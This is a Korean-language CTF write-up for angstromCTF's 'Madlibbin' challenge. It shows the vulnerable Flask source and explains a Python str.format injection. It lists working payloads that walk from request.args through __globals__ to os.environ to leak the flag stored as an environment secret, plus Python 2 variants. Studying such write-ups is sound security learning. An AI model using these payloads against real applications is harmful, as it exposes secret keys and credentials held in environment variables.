writeup

angstromCTF – Madlibbin

import binascii
import json
import os
import re
import redis

from flask import Flask
from flask import request
from flask import redirect, render_template
from flask import abort

app = Flask(__name__)
app.secret_key = os.environ.get('FLAG')

redis = redis.Redis(host='madlibbin_redis', port=6379, db=0)

generate = lambda: binascii.hexlify(os.urandom(16)).decode()
parse = lambda x: list(dict.fromkeys(re.findall(r'(?<=\{args\[)[\w\-\s]+(?=\]\})', x)))

@app.route('/', methods=['GET'])
def index():
	return render_template('index.html')

@app.route('/', methods=['POST'])
def create():
	tag = generate()
	template = request.form.get('template', '')
	madlib = {
		'template': template,
		'blanks': parse(template)
	}
	redis.set(tag, json.dumps(madlib))
	return redirect('/{}'.format(tag))

@app.route('/<tag>', methods=['GET'])
def view(tag):
	if redis.exists(tag):
		madlib = json.loads(redis.get(tag))
		if set(request.args.keys()) == set(madlib['blanks']):
			return render_template('result.html', stuff=madlib['template'].format(args=request.args))
		else:
			return render_template('fill.html', blanks=madlib['blanks'])
	else:
		abort(404)

if __name__ == '__main__':
	app.run()

python format string injection 문제이다. 강조된 문장에서 볼 수 있듯 args 변수에 request.args 를 대입하여 format 메소드의 인자로 이용하는데 request.args 부분은 조작이 불가능하지만, 대상 문자열은 마음대로 사용자의 입력대로 들어가므로 이를 이용해서, os.environ 을 읽어내면 해결되는 문제이다!

다만 format 함수의 대상이 되는 문자열의 중괄호 안에서 메소드 호출은 불가능하므로 메소드를 사용하지 않고 문제를 해결할 수 있어야 한다.

os 모듈의 environ 속성에 환경변수가 저장되어있으니 이를 참조해 주자.

# get environ
{args.get.__globals__[mimetypes].os.environ}
{args.__init__.__globals__[mimetypes].os.environ}
{args.__class__.__init__.__globals__[mimetypes].os.environ}
{args.__class__.__base__.__init__.__globals__[mimetypes].os.environ}

# only python2 (not this challenge)
{args.get.func_globals[mimetypes].os.environ}
{args.__init__.func_globals[mimetypes].os.environ}
{args.__class__.__init__.func_globals[mimetypes].os.environ}
{args.__class__.__base__.__init__.func_globals[mimetypes].os.environ}

Leave a Reply

Your email address will not be published. Required fields are marked *